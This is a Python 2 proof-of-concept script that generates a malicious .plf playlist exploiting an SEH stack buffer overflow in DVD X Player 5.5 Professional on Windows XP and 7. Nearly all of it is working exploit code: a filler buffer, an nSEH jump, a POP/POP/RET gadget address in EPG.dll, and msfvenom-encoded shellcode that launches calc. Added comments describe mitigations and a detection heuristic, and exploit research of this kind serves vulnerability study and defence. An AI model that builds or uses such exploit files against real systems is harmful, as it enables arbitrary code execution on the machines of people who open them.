#!/usr/bin/python
# Windows xp sp3 32 bits
# Windows 7 enterprise 32 bits
#
# Proof-of-concept generator for an SEH-based stack buffer overflow in
# DVD X Player 5.5 Professional, triggered through a crafted .plf file
# (presumably the playlist loader - confirm against the original advisory).
# The script only writes the crafted file to disk; the target application
# is never launched from here.
#
# Python 2 script (bare `print` statement at the end); the payload is built
# as a Python 2 byte-string and written with a text-mode handle.
#
# Defender notes: the hijack depends on EPG.dll being mapped without
# SafeSEH, ASLR or rebasing (see the author's module annotation next to
# `seh` below), so an overwritten handler record can point straight into
# that module.  SEHOP, SafeSEH-built modules and ASLR on the host process
# break this chain.  On disk the file is recognisable as a .plf carrying a
# long run of a single filler byte (608 x "A") followed by non-printable
# data, which is a usable detection heuristic for this family of PoCs.
import struct
# Name of the crafted playlist written at the end of the script.
outfile = 'popcalc_exploit_seh.plf'
# Just some junk at the beginning
# 608 filler bytes precede the SEH record in the author's layout.
junk = "A" * 608
# 00000000 EB06 jmp short 0x8
# Next-SEH pointer, packed big-endian so the bytes land as EB 06 90 90:
# a short jump over the handler address, padded with two NOPs.
nseh = struct.pack(">L",0xEB069090)
# 0x61617619 : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [EPG.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.21.2006 (C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll)
# Overwritten handler address (little-endian): the POP/POP/RET gadget
# in EPG.dll described on the line above.
seh = struct.pack("<L",0x61617619)
# msfvenom -p windows/exec CMD=calc EXITFUNC=seh -e x86/alpha_mixed -f python -b "\x00\x0a\x1a" -v shellcode
# 20-byte NOP sled ...
shellcode = "\x90" * 20 # nop sled
# ... doubled to 40 NOPs before the encoded payload.
shellcode += shellcode
# Alphanumeric-encoded (x86/alpha_mixed) windows/exec payload that starts
# calc, generated by the msfvenom command quoted above with bytes
# \x00, \x0a and \x1a excluded.
shellcode += "\x89\xe6\xda\xd3\xd9\x76\xf4\x5f\x57\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x4b\x4c\x78\x68\x4c\x42\x67\x70\x33\x30\x63\x30"
shellcode += "\x43\x50\x4f\x79\x59\x75\x65\x61\x79\x50\x35\x34"
shellcode += "\x4e\x6b\x56\x30\x70\x30\x6c\x4b\x72\x72\x64\x4c"
shellcode += "\x4c\x4b\x61\x42\x64\x54\x6e\x6b\x43\x42\x36\x48"
shellcode += "\x36\x6f\x6d\x67\x51\x5a\x35\x76\x65\x61\x69\x6f"
shellcode += "\x6c\x6c\x77\x4c\x75\x31\x51\x6c\x53\x32\x66\x4c"
shellcode += "\x61\x30\x4b\x71\x58\x4f\x66\x6d\x57\x71\x7a\x67"
shellcode += "\x59\x72\x4c\x32\x33\x62\x30\x57\x4c\x4b\x76\x32"
shellcode += "\x54\x50\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x50\x4c"
shellcode += "\x42\x31\x34\x38\x39\x73\x70\x48\x55\x51\x58\x51"
shellcode += "\x46\x31\x6e\x6b\x71\x49\x71\x30\x73\x31\x58\x53"
shellcode += "\x4c\x4b\x53\x79\x54\x58\x4b\x53\x65\x6a\x77\x39"
shellcode += "\x6e\x6b\x35\x64\x4e\x6b\x53\x31\x69\x46\x36\x51"
shellcode += "\x59\x6f\x6c\x6c\x59\x51\x68\x4f\x34\x4d\x57\x71"
shellcode += "\x4f\x37\x44\x78\x79\x70\x52\x55\x69\x66\x44\x43"
shellcode += "\x43\x4d\x4c\x38\x75\x6b\x31\x6d\x55\x74\x53\x45"
shellcode += "\x6d\x34\x62\x78\x6e\x6b\x43\x68\x75\x74\x63\x31"
shellcode += "\x39\x43\x55\x36\x4e\x6b\x64\x4c\x32\x6b\x4e\x6b"
shellcode += "\x51\x48\x45\x4c\x65\x51\x68\x53\x4c\x4b\x64\x44"
shellcode += "\x4e\x6b\x33\x31\x4e\x30\x4b\x39\x33\x74\x37\x54"
shellcode += "\x64\x64\x51\x4b\x43\x6b\x75\x31\x43\x69\x50\x5a"
shellcode += "\x53\x61\x59\x6f\x69\x70\x31\x4f\x43\x6f\x71\x4a"
shellcode += "\x4c\x4b\x57\x62\x78\x6b\x6e\x6d\x33\x6d\x61\x7a"
shellcode += "\x45\x51\x6e\x6d\x4e\x65\x4e\x52\x33\x30\x47\x70"
shellcode += "\x35\x50\x52\x70\x61\x78\x54\x71\x6e\x6b\x32\x4f"
shellcode += "\x6c\x47\x59\x6f\x69\x45\x4d\x6b\x6b\x4e\x56\x6e"
shellcode += "\x57\x42\x69\x7a\x62\x48\x4e\x46\x6f\x65\x4f\x4d"
shellcode += "\x6f\x6d\x6b\x4f\x38\x55\x37\x4c\x57\x76\x53\x4c"
shellcode += "\x47\x7a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x43\x35"
shellcode += "\x4d\x6b\x51\x57\x34\x53\x64\x32\x70\x6f\x70\x6a"
shellcode += "\x45\x50\x70\x53\x69\x6f\x7a\x75\x45\x33\x73\x51"
shellcode += "\x32\x4c\x30\x63\x55\x50\x41\x41"
# File layout: filler | nSEH | SEH | NOP sled + encoded payload.
payload = junk + nseh + seh + shellcode
# Text-mode write of a Python 2 str; nothing in the payload is a newline
# (\x0a is an excluded byte), so no translation is expected here.
with open(outfile,'w') as exploit:
    exploit.write(payload)
print 'Wrote %u bytes to %s' % (len(payload), outfile)